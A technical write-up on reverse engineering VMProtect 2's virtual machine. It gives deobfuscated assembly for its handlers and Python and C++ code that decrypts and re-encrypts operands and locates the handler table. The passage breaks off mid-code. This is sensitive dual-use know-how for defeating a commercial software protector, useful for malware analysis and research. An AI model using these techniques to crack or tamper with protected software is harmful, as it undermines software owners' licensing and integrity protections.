VMProtect 2 encrypts its virtual instructions using a rolling decryption key. This key is located in RBX and is initially set to the address of the virtual instructions. The transformations done to decrypt operands consist of XOR, NEG, NOT, AND, ROR, ROL, SHL, SHR, ADD, SUB, INC, DEC, and BSWAP. When an operand is decrypted, the first transformation applied to it includes the rolling decryption key; thus only XOR, AND, ROR, ROL, ADD, and SUB can ever be the first transformation. Then there are always three transformations applied directly to the operand. At this stage the operand is completely decrypted, and RAX holds the decrypted operand value. Lastly, the rolling decryption key is updated by transforming it with the fully decrypted operand value. An example looks like this:

.vmp0:0000000140005A0A 30 D8 xor al, bl ; decrypt using rolling key…
.vmp0:0000000140005A11 F6 D8 neg al ; 1/3 transformations…
.vmp0:0000000140005A19 C0 C0 05 rol al, 5 ; 2/3 transformations…
.vmp0:0000000140005A26 FE C0 inc al ; 3/3 transformations…
.vmp0:0000000140005A2F 30 C3 xor bl, al ; update rolling key…
The above snippet of code decrypts the first operand, which is always the instruction’s opcode. This code is part of the calc_jmp routine; however, the transformation format is the same for any second operand.

VM Handlers — Specifications
VM handlers contain the native code to execute virtual instructions. Every VMProtect 2 binary has a vm handler table which is an array of 256 QWORD’s. Each entry contains an encrypted relative virtual address to the corresponding VM handler. There are many variants of virtual instructions such as different sizes of immediate values as well as sign and zero extended values. This section will go over a few virtual instruction examples as well as some key information which must be noted when trying to parse VM handlers.

VM handlers which handle immediate values fetch the encrypted immediate value from RSI. The usual five transformations are then applied to this encrypted immediate value, following the same format as the calc_jmp transformations. The first transformation is applied to the encrypted immediate value with the rolling decryption key as the source of the operation. Then three transformations are applied directly to the encrypted immediate value, decrypting it fully. Lastly, the rolling decryption key is updated by performing the first transformation with the destination and source operands swapped.

.vmp0:00000001400076D2 48 8B 06 mov rax, [rsi] ; fetch immediate value…
.vmp0:00000001400076D9 48 31 D8 xor rax, rbx ; rolling key transformation…
.vmp0:00000001400076DE 48 C1 C0 1D rol rax, 1Dh ; 1/3 transformations…
.vmp0:0000000140007700 48 0F C8 bswap rax ; 2/3 transformations…
.vmp0:000000014000770F 48 C1 C0 30 rol rax, 30h ; 3/3 transformations…
.vmp0:0000000140007714 48 31 C3 xor rbx, rax ; update rolling key…
Also note that vm handlers are subjected to opaque branching as well as deadstore obfuscation.
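As a concrete model, the immediate decryption above (xor rbx / rol 0x1D / bswap / rol 0x30) can be emulated and inverted in Python. The transformation chain is specific to this sample; the inverse simply applies the opposite operations in reverse order, which is exactly what one would need to encode their own immediate values.

```python
M64 = (1 << 64) - 1

def rol64(v, n):
    n %= 64
    return ((v << n) | (v >> (64 - n))) & M64

def bswap64(v):
    return int.from_bytes(v.to_bytes(8, 'little'), 'big')

def decrypt_imm64(enc, key):
    """Mirrors the listing above; returns (value, updated rolling key)."""
    v = enc ^ key          # xor rax, rbx — rolling key transform
    v = rol64(v, 0x1D)     # rol rax, 1Dh
    v = bswap64(v)         # bswap rax
    v = rol64(v, 0x30)     # rol rax, 30h
    return v, key ^ v      # xor rbx, rax — update rolling key

def encrypt_imm64(val, key):
    """Inverse chain, applied in reverse order."""
    v = rol64(val, 64 - 0x30)  # ror 0x30 undoes rol 0x30
    v = bswap64(v)             # bswap is its own inverse
    v = rol64(v, 64 - 0x1D)    # ror 0x1D undoes rol 0x1D
    return v ^ key
```

Since the key update is just the first transform with operands swapped, an encoder must also track the key across every emitted operand, exactly as the VM does.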

LCONST — Load Constant Value Onto Stack
One of the most iconic virtual machine instructions is LCONST. This virtual instruction loads a constant value from the second operand of a virtual instruction onto the stack.

LCONSTQ — Load Constant QWORD
This is the deobfuscated view of the LCONSTQ VM handler. As you can see, this VM handler reads the second operand of the virtual instruction out of VIP (RSI). It then decrypts this immediate value and advances VIP. The decrypted immediate value is then put onto the virtual stack.

mov rax, [rsi]
xor rax, rbx ; transformation
bswap rax ; transformation
lea rsi, [rsi+8] ; advance VIP…
rol rax, 0Ch ; transformation
inc rax ; transformation
xor rbx, rax ; transformation (update rolling decrypt key)
sub rbp, 8
mov [rbp+0], rax
LCONSTCDQE — Load Constant DWORD Sign Extended to a QWORD
This virtual instruction loads a DWORD size operand from RSI, decrypts it, and extends it to a QWORD, finally putting it on the virtual stack.

mov eax, [rsi]
xor eax, ebx
xor eax, 32B63802h
dec eax
lea rsi, [rsi+4] ; advance VIP
xor eax, 7E4087EEh

; look below for details on this…
push rbx
xor [rsp], eax
pop rbx

cdqe ; sign extend EAX to RAX…
sub rbp, 8
mov [rbp+0], rax
Note that this last vm handler updates the rolling decryption key by putting the key on the stack and then applying the transformation in memory. This is something that could cause significant problems when parsing these VM handlers. Luckily there is a very simple trick to handle it: always remember that the transformation applied to the rolling key is the same as the first transformation. In the above case it’s a simple XOR.

LCONSTCBW — Load Constant Byte Convert To Word
LCONSTCBW loads a constant byte value from RSI, decrypts it, and zero extends the result to a WORD value. This decrypted value is then placed upon the virtual stack.

movzx eax, byte ptr [rsi]
add al, bl
inc al
neg al
ror al, 0x06
add bl, al
mov ax, [rax+rdi*1]
sub rbp, 0x02
inc rsi
mov [rbp], ax
LCONSTCWDE — Load Constant Word Convert To DWORD
LCONSTCWDE loads a constant word from RSI, decrypts it, and sign extends it to a DWORD. Lastly the resulting value is placed upon the virtual stack.

mov ax, [rsi]
add rsi, 0x02
xor ax, bx
rol ax, 0x0E
xor ax, 0xA808
neg ax
xor bx, ax
cwde
sub rbp, 0x04
mov [rbp], eax
LCONSTDW — Load Constant DWORD
LCONSTDW loads a constant dword from RSI, decrypts it, and lastly places the result upon the virtual stack. Also note that VIP advances backwards in the example below. You can see this in the operand fetch, as it subtracts from RSI prior to the dereference.

mov eax, [rsi-0x04]
bswap eax
add eax, ebx
dec eax
neg eax
xor eax, 0x2FFD187C
push rbx
add [rsp], eax
pop rbx
sub rbp, 0x04
mov [rbp], eax
add rsi, 0xFFFFFFFFFFFFFFFC
LREG — Load Scratch Register Value Onto Stack
Let’s look at another VM handler, this one by the name of LREG. Just like LCONST there are many variants of this instruction, especially for different sizes. LREG is also going to be in every single binary as it’s used inside of the VM to load register values into scratch registers. More on this later.

LREGQ — Load Scratch Register QWORD
LREGQ has a one byte immediate value, which is the scratch register index. A pointer to the scratch registers is always loaded into RDI. As described above, there are five total transformations applied to the immediate value to decrypt it. The first transformation is applied with the rolling decryption key, followed by three transformations applied directly to the immediate value, which fully decrypts it. Lastly, the rolling decryption key is updated by applying the first transformation to it with the decrypted immediate value as the source.

mov al, [rsi]
sub al, bl
ror al, 2
not al
inc al
sub bl, al
mov rdx, [rax+rdi]
sub rbp, 8
mov [rbp+0], rdx
inc rsi
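A small C++ model of the index decryption above; it assumes a 256-byte scratch area viewed as thirty-two QWORD registers, and the names (lregq, ror8) plus the transformation constants are specific to this sample:

```cpp
#include <array>
#include <cassert>
#include <cstdint>

// Rotate an 8-bit value right by n bits (models ROR al, n).
std::uint8_t ror8(std::uint8_t v, unsigned n)
{
    return static_cast<std::uint8_t>((v >> n) | (v << (8 - n)));
}

// Models LREGQ: decrypt the one-byte scratch register offset with the low
// byte of the rolling key (BL), update the key, then fetch the QWORD from
// the scratch register area (pointed to by RDI in the real handler).
std::uint64_t lregq(std::uint8_t enc_idx, std::uint8_t& bl,
                    const std::array<std::uint64_t, 32>& scratch)
{
    std::uint8_t idx = static_cast<std::uint8_t>(enc_idx - bl); // sub al, bl
    idx = ror8(idx, 2);                                         // ror al, 2
    idx = static_cast<std::uint8_t>(~idx);                      // not al
    idx = static_cast<std::uint8_t>(idx + 1);                   // inc al
    bl = static_cast<std::uint8_t>(bl - idx);                   // sub bl, al (update key)
    return scratch[idx / 8]; // mov rdx, [rax+rdi] (idx is a byte offset)
}
```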
LREGDW — Load Scratch Register DWORD
LREGDW is a variant of LREG which loads a DWORD from a scratch register onto the stack. It has two operands, the second being a single byte representing the scratch register index. The snippet of code below is a deobfuscated view of LREGDW.

mov al, [rsi]
sub al, bl
add al, 97h
ror al, 1
neg al
sub bl, al
mov edx, [rax+rdi]
sub rbp, 4
mov [rbp+0], edx
SREG — Set Scratch Register Value
Another iconic virtual instruction present in every single binary is SREG. There are many variants of this instruction which set scratch registers to values of various sizes. This virtual instruction has two operands, the second being a single byte immediate value containing the scratch register index.

SREGQ — Set Scratch Register Value QWORD
SREGQ sets a virtual scratch register with a QWORD value from on top of the virtual stack. This virtual instruction consists of two operands, the second being a single byte representing the virtual scratch register.

movzx eax, byte ptr [rsi]
sub al, bl
ror al, 2
not al
inc al
sub bl, al
mov rdx, [rbp+0]
add rbp, 8
mov [rax+rdi], rdx
SREGDW — Set Scratch Register Value DWORD
SREGDW sets a virtual scratch register with a DWORD value from on top of the virtual stack. This virtual instruction consists of two operands, the second being a single byte representing the virtual scratch register.

movzx eax, byte ptr [rsi-0x01]
xor al, bl
inc al
ror al, 0x02
add al, 0xDE
xor bl, al
lea rsi, [rsi-0x01]
mov dx, [rbp]
add rbp, 0x02
mov [rax+rdi*1], dx
SREGW — Set Scratch Register Value WORD
SREGW sets a virtual scratch register with a WORD value from on top of the virtual stack. This virtual instruction consists of two operands, the second being a single byte representing the virtual scratch register.

movzx eax, byte ptr [rsi-0x01]
sub al, bl
ror al, 0x06
neg al
rol al, 0x02
sub bl, al
mov edx, [rbp]
add rbp, 0x04
dec rsi
mov [rax+rdi*1], edx
SREGB — Set Scratch Register Value Byte
SREGB sets a virtual scratch register with a BYTE value from on top of the virtual stack. This virtual instruction consists of two operands, the second being a single byte representing the virtual scratch register.

mov al, [rsi-0x01]
xor al, bl
not al
xor al, 0x10
neg al
xor bl, al
sub rsi, 0x01
mov dx, [rbp]
add rbp, 0x02
mov [rax+rdi*1], dl
ADD — Add Two Values
The virtual ADD instruction adds two values on the stack together and stores the result in the second value position on the stack. RFLAGS is then pushed onto the stack as the ADD instruction alters RFLAGS.

ADDQ — Add Two QWORD Values
ADDQ adds two QWORD values stored on top of the virtual stack. RFLAGS is also pushed onto the stack as the native ADD instruction alters flags.

mov rax, [rbp+0]
add [rbp+8], rax
pushfq
pop qword ptr [rbp+0]
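As a concrete illustration of the stack mechanics, here is a C++ sketch of ADDQ over a simulated virtual stack. Only CF and ZF are modeled for the PUSHFQ result; the native instruction naturally produces the full RFLAGS:

```cpp
#include <cassert>
#include <cstdint>

// Minimal model of ADDQ. `vsp` points at the top of a downward-growing
// virtual stack, so vsp[0] is [rbp+0] and vsp[1] is [rbp+8].
void addq(std::uint64_t* vsp)
{
    std::uint64_t a = vsp[0];            // mov rax, [rbp+0]
    std::uint64_t sum = vsp[1] + a;      // add [rbp+8], rax
    vsp[1] = sum;

    std::uint64_t rflags = 0x202;        // reserved bit 1 and IF set
    if (sum < a) rflags |= 1ull << 0;    // CF: unsigned carry out
    if (sum == 0) rflags |= 1ull << 6;   // ZF: result is zero
    vsp[0] = rflags;                     // pushfq / pop qword ptr [rbp+0]
}
```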
ADDW — Add Two WORDS Values
ADDW adds two WORD values stored on top of the virtual stack. RFLAGS is also pushed onto the stack as the native ADD instruction alters flags.

mov ax, [rbp]
sub rbp, 0x06
add [rbp+0x08], ax
pushfq
pop [rbp]
ADDB — Add Two Bytes Values
ADDB adds two BYTE values stored on top of the virtual stack. RFLAGS is also pushed onto the stack as the native ADD instruction alters flags.

mov al, [rbp]
sub rbp, 0x06
add [rbp+0x08], al
pushfq
pop [rbp]
MUL — Unsigned Multiplication
The virtual MUL instruction multiplies two values stored on the stack together. These vm handlers use the native MUL instruction; additionally, RFLAGS is pushed onto the stack. Lastly, it is a single operand virtual instruction, which means there is no immediate value associated with it.

MULQ — Unsigned Multiplication of QWORD’s
MULQ multiplies two QWORD values together; the result is stored on the stack at VSP+24, and additionally RFLAGS is pushed onto the stack.

mov rax, [rbp+0x08]
sub rbp, 0x08
mul rdx
mov [rbp+0x08], rdx
mov [rbp+0x10], rax
pushfq
pop [rbp]
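The RDX:RAX split of the native MUL result can be reproduced with a 128-bit multiply. The sketch below assumes a GCC/Clang-style unsigned __int128 and leaves out the RFLAGS push:

```cpp
#include <cassert>
#include <cstdint>

// Models the multiply itself: the full 128-bit product is written back as
// the high (RDX) and low (RAX) halves, exactly like the native MUL.
void mulq(std::uint64_t a, std::uint64_t b,
          std::uint64_t& hi, std::uint64_t& lo)
{
    unsigned __int128 product =
        static_cast<unsigned __int128>(a) * b;      // mul rdx
    hi = static_cast<std::uint64_t>(product >> 64); // mov [rbp+0x08], rdx
    lo = static_cast<std::uint64_t>(product);       // mov [rbp+0x10], rax
}
```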
DIV — Unsigned Division
The virtual DIV instruction uses the native DIV instruction; the operands used in the division are located on top of the virtual stack. This is a single operand virtual instruction, thus there is no immediate value. RFLAGS is also pushed onto the stack as the native DIV instruction alters RFLAGS.

DIVQ — Unsigned Division Of QWORD’s
DIVQ divides two QWORD values located on the virtual stack. RFLAGS is then pushed onto the stack.

mov rdx, [rbp]
mov rax, [rbp+0x08]
div [rbp+0x10]
mov [rbp+0x08], rdx
mov [rbp+0x10], rax
pushfq
pop [rbp]
READ — Read Memory
The READ instruction reads memory of different sizes. There is a variant of this instruction to read one, two, four, and eight bytes.

READQ — Read QWORD
READQ reads a QWORD value from the address stored on top of the stack. This virtual instruction sometimes has an SS segment prefix on the memory access; however, not all READQ vm handlers have it. The QWORD value is then stored on top of the virtual stack.

mov rax, [rbp]
mov rax, ss:[rax]
mov [rbp], rax
READDW — Read DWORD
READDW reads a DWORD value from the address stored on top of the virtual stack. The DWORD value is then put on top of the virtual stack. Below are two examples of READDW, one which uses this segment index syntax and the other without it.

mov rax, [rbp]
add rbp, 0x04
mov eax, [rax]
mov [rbp], eax
Note the segment offset usage below with ss…

mov rax, [rbp]
add rbp, 0x04
mov eax, ss:[rax]
mov [rbp], eax
READW — Read Word
READW reads a WORD value from the address stored on top of the virtual stack. The WORD value is then put on top of the virtual stack. Below is an example of this vm handler using a segment index syntax however keep in mind there are vm handlers without this segment index.

mov rax, [rbp]
add rbp, 0x06
mov ax, ss:[rax]
mov [rbp], ax
WRITE — Write Memory
The WRITE virtual instruction writes up to eight bytes to an address. There are four variants of this virtual instruction, one for each power of two up to and including eight. There are also versions of each vm handler which use a segment prefix in the instruction encoding. However, in long mode most segment base addresses are zero. The segment that always seems to be used is SS, which has a base of zero, so the segment base has no effect here; it simply makes these vm handlers a little more difficult to parse.

WRITEQ — Write Memory QWORD
WRITEQ writes a QWORD value to the address located on top of the virtual stack. The stack is incremented by 16 bytes.

.vmp0:0000000140005A74 48 8B 45 00 mov rax, [rbp+0]
.vmp0:0000000140005A82 48 8B 55 08 mov rdx, [rbp+8]
.vmp0:0000000140005A8A 48 83 C5 10 add rbp, 10h
.vmp0:00000001400075CF 48 89 10 mov [rax], rdx
WRITEDW — Write DWORD
WRITEDW writes a DWORD value to the address located on top of the virtual stack. The stack is incremented by 12 bytes.

mov rax, [rbp]
mov edx, [rbp+0x08]
add rbp, 0x0C
mov [rax], edx
Note the segment offset ss usage below…

mov rax, [rbp]
mov edx, [rbp+0x08]
add rbp, 0x0C
mov ss:[rax], edx ; note the SS usage here…
WRITEW — Write WORD
The WRITEW virtual instruction writes a WORD value to the address located on top of the virtual stack. The stack is then incremented by ten bytes.

mov rax, [rbp]
mov dx, [rbp+0x08]
add rbp, 0x0A
mov ss:[rax], dx
WRITEB — Write Byte
The WRITEB virtual instruction writes a BYTE value to the address located on top of the virtual stack. The stack is then incremented by ten bytes.

mov rax, [rbp]
mov dl, [rbp+0x08]
add rbp, 0x0A
mov ss:[rax], dl
SHL — Shift Left
The SHL vm handler shifts a value located on top of the stack to the left by a number of bits. The number of bits to shift is stored above the value to be shifted on the stack. The result is then put onto the stack as well as RFLAGS.

SHLCBW — Shift Left Convert Result To WORD
SHLCBW shifts a byte value to the left and zero extends the result to a WORD. RFLAGS is pushed onto the stack.

mov al, [rbp+0]
mov cl, [rbp+2]
sub rbp, 6
shl al, cl
mov [rbp+8], ax
pushfq
pop qword ptr [rbp+0]
SHLW — Shift Left WORD
SHLW shifts a WORD value to the left. RFLAGS is pushed onto the virtual stack.

mov ax, [rbp]
mov cl, [rbp+0x02]
sub rbp, 0x06
shl ax, cl
mov [rbp+0x08], ax
pushfq
pop [rbp]
SHLDW — Shift Left DWORD
SHLDW shifts a DWORD to the left. RFLAGS is pushed onto the virtual stack.

mov eax, [rbp]
mov cl, [rbp+0x04]
sub rbp, 0x06
shl eax, cl
mov [rbp+0x08], eax
pushfq
pop [rbp]
SHLQ — Shift Left QWORD
SHLQ shifts a QWORD to the left. RFLAGS is pushed onto the virtual stack.

mov rax, [rbp]
mov cl, [rbp+0x08]
sub rbp, 0x06
shl rax, cl
mov [rbp+0x08], rax
pushfq
pop [rbp]
SHLD — Shift Left Double Precision
The SHLD virtual instruction shifts a value to the left using the native instruction SHLD. The result is then put onto the stack as well as RFLAGS. There is a variant of this instruction for one, two, four, and eight byte shifts.

SHLDQ — Shift Left Double Precision QWORD
SHLDQ shifts a QWORD to the left with double precision. The result is then put onto the virtual stack and RFLAGS is pushed onto the virtual stack.

mov rax, [rbp]
mov rdx, [rbp+0x08]
mov cl, [rbp+0x10]
add rbp, 0x02
shld rax, rdx, cl
mov [rbp+0x08], rax
pushfq
pop [rbp]
SHLDDW — Shift Left Double Precision DWORD
The SHLDDW virtual instruction shifts a DWORD value to the left with double precision. The result is pushed onto the virtual stack as well as RFLAGS.

mov eax, [rbp]
mov edx, [rbp+0x04]
mov cl, [rbp+0x08]
sub rbp, 0x02
shld eax, edx, cl
mov [rbp+0x08], eax
pushfq
pop [rbp]
SHR — Shift Right
The SHR instruction is the complement of SHL. This virtual instruction alters RFLAGS, and thus the RFLAGS value will be on top of the stack after executing this virtual instruction.

SHRQ — Shift Right QWORD
SHRQ shifts a QWORD value to the right. The result is put onto the virtual stack as well as RFLAGS.

mov rax, [rbp]
mov cl, [rbp+0x08]
sub rbp, 0x06
shr rax, cl
mov [rbp+0x08], rax
pushfq
pop [rbp]
SHRD — Double Precision Shift Right
The SHRD virtual instruction shifts a value to the right with double precision. There is a variant of this instruction for one, two, four, and eight byte shifts. The virtual instruction concludes with RFLAGS being pushed onto the virtual stack.

SHRDQ — Double Precision Shift Right QWORD
SHRDQ shifts a QWORD value to the right with double precision. The result is put onto the virtual stack. RFLAGS is then pushed onto the virtual stack.

mov rax, [rbp]
mov rdx, [rbp+0x08]
mov cl, [rbp+0x10]
add rbp, 0x02
shrd rax, rdx, cl
mov [rbp+0x08], rax
pushfq
pop [rbp]
SHRDDW — Double Precision Shift Right DWORD
SHRDDW shifts a DWORD value to the right with double precision. The result is put onto the virtual stack. RFLAGS is then pushed onto the virtual stack.

mov eax, [rbp]
mov edx, [rbp+0x04]
mov cl, [rbp+0x08]
sub rbp, 0x02
shrd eax, edx, cl
mov [rbp+0x08], eax
pushfq
pop [rbp]
NAND — Not Then And
The NAND instruction applies a NOT to the value on top of the stack, then bitwise ANDs the result into the next value on the stack. The AND instruction alters RFLAGS; thus, RFLAGS will be pushed onto the virtual stack.

NANDW — Not Then And WORD’s
NANDW NOT’s two WORD values then bitwise AND’s them together. RFLAGS is then pushed onto the virtual stack.

not dword ptr [rbp]
mov ax, [rbp]
sub rbp, 0x06
and [rbp+0x08], ax
pushfq
pop [rbp]
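A quick C++ model shows why a NOT-then-AND primitive is attractive for a reduced VM instruction set: together with an all-ones constant it can rebuild the usual logic operations. The helper names below (vnand, vnot, vand, vor) are hypothetical:

```cpp
#include <cassert>
#include <cstdint>

// The NANDW primitive as shown above: NOT the top value,
// then AND it into the next value.
std::uint16_t vnand(std::uint16_t a, std::uint16_t b)
{
    return static_cast<std::uint16_t>(~a) & b; // not [rbp]; and [rbp+8], ax
}

// With an all-ones constant, this one primitive rebuilds NOT, AND, and OR:
std::uint16_t vnot(std::uint16_t a)                  { return vnand(a, 0xFFFF); }
std::uint16_t vand(std::uint16_t a, std::uint16_t b) { return vnand(vnot(a), b); }
std::uint16_t vor(std::uint16_t a, std::uint16_t b)  { return vnot(vnand(a, vnot(b))); }
```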
READCR3 — Read Control Register Three
The READCR3 virtual instruction is a wrapper vm handler around the native mov reg, cr3. This instruction will put the value of CR3 onto the virtual stack.

mov rax, cr3
sub rbp, 0x08
mov [rbp], rax
WRITECR3 — Write Control Register Three
The WRITECR3 virtual instruction is a wrapper vm handler around the native mov cr3, reg. This instruction will put a value into CR3.

mov rax, [rbp]
add rbp, 0x08
mov cr3, rax
PUSHVSP — Push Virtual Stack Pointer
The PUSHVSP virtual instruction pushes the value contained in the native register RBP onto the virtual stack. There is a variant of this instruction for one, two, four, and eight bytes.

PUSHVSPQ — Push Virtual Stack Pointer QWORD
PUSHVSPQ pushes the entire value of the virtual stack pointer onto the virtual stack.

mov rax, rbp
sub rbp, 0x08
mov [rbp], rax
PUSHVSPDW — Push Virtual Stack Pointer DWORD
PUSHVSPDW pushes the bottom four bytes of the virtual stack pointer onto the virtual stack.

mov eax, ebp
sub rbp, 0x04
mov [rbp], eax
PUSHVSPW — Push Virtual Stack Pointer WORD
PUSHVSPW pushes the bottom WORD value of the virtual stack pointer onto the virtual stack.

mov eax, ebp
sub rbp, 0x02
mov [rbp], ax
LVSP — Load Virtual Stack Pointer
This virtual instruction loads the virtual stack pointer register with the value at the top of the stack.

mov rbp, [rbp]
LVSPW — Load Virtual Stack Pointer Word
This virtual instruction loads the virtual stack pointer register with the WORD value at the top of the stack.

mov bp, [rbp]
LVSPDW — Load Virtual Stack Pointer DWORD
This virtual instruction loads the virtual stack pointer register with the DWORD value at the top of the stack.

mov ebp, [rbp]
LRFLAGS — Load RFLAGS
This virtual instruction loads the native flags register with the QWORD value at the top of the stack.

push [rbp]
add rbp, 0x08
popfq
JMP — Virtual Jump Instruction
The virtual JMP instruction changes the RSI register to point to a new set of virtual instructions. The value at the top of the stack is the lower 32 bits of the RVA from the module base to the virtual instructions. The upper 32 bits of the image base value found in the optional header of the PE file are then added to this value, and lastly the module base address is added.

mov esi, [rbp]
add rbp, 0x08
lea r12, [0x0000000000048F29]
mov rax, 0x00 ; image base bytes above 32bits…
add rsi, rax
mov rbx, rsi ; update decrypt key
add rsi, [rbp] ; add module base address
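The target computation reduces to a few additions. The sketch below mirrors the snippet above with hypothetical inputs (vjmp_target is my name; the real handler also copies the intermediate sum into RBX as the new rolling decryption key):

```cpp
#include <cassert>
#include <cstdint>

// Models the virtual JMP target computation: the low 32 bits of the RVA
// come off the virtual stack, then the high bits of the PE image base and
// the runtime module base are added in.
std::uint64_t vjmp_target(std::uint32_t rva_low,
                          std::uint64_t image_base_high,
                          std::uint64_t module_base)
{
    std::uint64_t rsi = rva_low;   // mov esi, [rbp]
    rsi += image_base_high;        // add rsi, rax (image base bytes above 32 bits)
    rsi += module_base;            // add rsi, [rbp] (module base address)
    return rsi;
}
```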
CALL — Virtual Call Instruction
The virtual call instruction takes an address off the top of the virtual stack and then calls it. RDX is used to hold the address, so you can only really call functions with a single parameter using this.

mov rdx, [rbp]
add rbp, 0x08
call rdx
Significant Virtual Machine Signatures — Static Analysis
Now that VMProtect 2’s virtual machine architecture has been documented, we can reflect on the significant signatures. In addition, the obfuscation that VMProtect 2 generates can be handled with quite simple techniques, which makes parsing the vm_entry routine trivial. vm_entry has no legitimate JCC’s, so every time we encounter a JCC we can simply follow it, remove the JCC from the instruction stream, and stop once we hit a JMP RCX/RDX. We can remove most dead stores by following how an instruction is used with Zydis, specifically by tracking read and write dependencies on the destination register of each instruction. Finally, with the cleaned up vm_entry we can iterate through all of the instructions and find the vm handlers, the transformations required to decrypt vm handler table entries, and lastly the transformations required to decrypt the relative virtual address to the virtual instructions pushed onto the stack prior to jumping to vm_entry.
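The dead store removal mentioned above can be sketched without Zydis by using a toy instruction record of which register is written and which are read (insn_t and remove_dead_stores are hypothetical names; the real pass walks ZydisDecodedInstruction operands instead):

```cpp
#include <cassert>
#include <cstddef>
#include <string>
#include <vector>

// A toy instruction: one destination register and the registers it reads.
struct insn_t
{
    std::string dest;               // register written
    std::vector<std::string> reads; // registers read
};

// An instruction is a dead store if its destination register is written
// again later in the stream before anything reads it.
std::vector<insn_t> remove_dead_stores(const std::vector<insn_t>& stream)
{
    std::vector<insn_t> out;
    for (std::size_t i = 0; i < stream.size(); ++i)
    {
        bool dead = false;
        for (std::size_t j = i + 1; j < stream.size(); ++j)
        {
            // someone reads the value -> the store is live...
            bool read = false;
            for (const auto& r : stream[j].reads)
                if (r == stream[i].dest) read = true;
            if (read) break;
            // overwritten before any read -> dead store...
            if (stream[j].dest == stream[i].dest) { dead = true; break; }
        }
        if (!dead) out.push_back(stream[i]);
    }
    return out;
}
```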

Locating VM Handler Table
One of the best and most well known signatures is LEA R12, vm_handlers. This instruction is located inside of the vm_entry snippet of code and loads the linear virtual address of the vm handler table into R12. Using Zydis we can easily locate and parse this LEA to locate the vm handler table ourselves.

std::uintptr_t* vm::handler::table::get(const zydis_routine_t& vm_entry)
{
    const auto result = std::find_if(
        vm_entry.begin(), vm_entry.end(),
        [](const zydis_instr_t& instr_data) -> bool
        {
            const auto instr = &instr_data.instr;
            // lea r12, vm_handlers... (always r12)...
            if (instr->mnemonic == ZYDIS_MNEMONIC_LEA &&
                instr->operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER &&
                instr->operands[0].reg.value == ZYDIS_REGISTER_R12 &&
                !instr->raw.sib.base) // no register used for the sib base...
                return true;

            return false;
        }
    );

    if (result == vm_entry.end())
        return nullptr;

    std::uintptr_t ptr = 0u;
    ZydisCalcAbsoluteAddress(&result->instr,
        &result->instr.operands[1], result->addr, &ptr);

    return reinterpret_cast<std::uintptr_t*>(ptr);
}
The above Zydis routine will locate the address of the VM handler table statically. It only requires a vector of ZydisDecodedInstructions, one for each instruction in the vm_entry routine. My implementation of this (vmprofiler) will deobfuscate vm_entry first then pass around this vector.

Locating VM Handler Table Entry Decryption
You can easily, programmatically determine what transformation is applied to VM handler table entries by first locating the instruction which fetches entries from said table. This instruction is documented in the vm_entry section, it consists of a SIB instruction with RDX or RCX as the destination, R12 as the base, RAX as the index, and eight as the scale.

.vmp0:0000000140005A41 49 8B 14 C4 mov rdx, [r12+rax*8]
This is easily located using Zydis. All that must be done is locate a SIB mov instruction with RCX or RDX as the destination, R12 as the base, RAX as the index, and lastly eight as the scale. Then, using Zydis, we can find the next instruction with RDX or RCX as the destination; this instruction will be the transformation applied to VM handler table entries.

bool vm::handler::table::get_transform(
    const zydis_routine_t& vm_entry, ZydisDecodedInstruction* transform_instr)
{
    ZydisRegister rcx_or_rdx = ZYDIS_REGISTER_NONE;

    auto handler_fetch = std::find_if(
    vm_entry.begin(), vm_entry.end(),
    [&](const zydis_instr_t& instr_data) -> bool
    {
        const auto instr = &instr_data.instr;
        if (instr->mnemonic == ZYDIS_MNEMONIC_MOV &&
            instr->operand_count == 2 &&
            instr->operands[1].type == ZYDIS_OPERAND_TYPE_MEMORY &&
            instr->operands[1].mem.base == ZYDIS_REGISTER_R12 &&
            instr->operands[1].mem.index == ZYDIS_REGISTER_RAX &&
            instr->operands[1].mem.scale == 8 &&
            instr->operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER &&
            (instr->operands[0].reg.value == ZYDIS_REGISTER_RDX ||
                instr->operands[0].reg.value == ZYDIS_REGISTER_RCX))
        {
            rcx_or_rdx = instr->operands[0].reg.value;
            return true;
        }

        return false;
    }
);

// check to see if we found the fetch instruction and if the next instruction
// is not the end of the vector...
if (handler_fetch == vm_entry.end() || ++handler_fetch == vm_entry.end() ||
    // must be RCX or RDX... else something went wrong...
    (rcx_or_rdx != ZYDIS_REGISTER_RCX && rcx_or_rdx != ZYDIS_REGISTER_RDX))
    return false;

// find the next instruction that writes to RCX or RDX...
// the register is determined by the vm handler fetch above...
auto handler_transform = std::find_if(
    handler_fetch, vm_entry.end(),
    [&](const zydis_instr_t& instr_data) -> bool
    {
        if (instr_data.instr.operands[0].reg.value == rcx_or_rdx &&
            instr_data.instr.operands[0].actions & ZYDIS_OPERAND_ACTION_WRITE)
            return true;
        return false;
    }
);

if (handler_transform == vm_entry.end())
    return false;

    *transform_instr = handler_transform->instr;
    return true;
}
This function will parse the vm_entry routine and return the transformation done to decrypt VM handler table entries. In C++ each transformation operation can be implemented in lambdas and a single function can be coded to return the corresponding lambda routine for the transformation that must be applied.

.vmp0:0000000140005A41 49 8B 14 C4 mov rdx, [r12+rax*8]
.vmp0:0000000140005A49 48 81 F2 49 21 3D 7F xor rdx, 7F3D2149h
The above code is equivalent to the C++ code below, which decrypts vm handler entries. To encrypt new values, the inverse operation must be applied; for XOR, the inverse is simply XOR itself.

vm::decrypt_handler _decrypt_handler =
    [](std::uint8_t idx) -> std::uint64_t
    {
        return vm_handlers[idx] ^ 0x7F3D2149;
    };

// this is not the best example as the inverse of XOR is XOR...
vm::encrypt_handler _encrypt_handler =
    [](std::uint8_t idx) -> std::uint64_t
    {
        return vm_handlers[idx] ^ 0x7F3D2149;
    };
Handling Transformations — Templated Lambdas and Maps
The above decrypt and encrypt handlers can be dynamically generated by creating a map keyed on each transformation type with a C++ lambda reimplementation of that instruction as the value. Furthermore, a routine to handle dynamic value sizes can be created. This prevents a switch statement from having to be written every single time a transformation is required.

namespace transform
{
    // ...
    template <class T>
    inline std::map<ZydisMnemonic, std::function<T(T, T)>> transforms =
    {
        { ZYDIS_MNEMONIC_ADD, _add<T> },
        { ZYDIS_MNEMONIC_XOR, _xor<T> },
        { ZYDIS_MNEMONIC_BSWAP, _bswap<T> },
        // SUB, INC, DEC, OR, AND, ETC...
    };

    // max size of a and b is 64 bits, a and b is then converted to
    // the number of bits in bitsize, the transformation is applied,
    // finally the result is converted back to 64bits...
    inline auto apply(std::uint8_t bitsize, ZydisMnemonic op,
        std::uint64_t a, std::uint64_t b) -> std::uint64_t
    {
        switch (bitsize)
        {
        case 8:
            return transforms<std::uint8_t>[op](a, b);
        case 16:
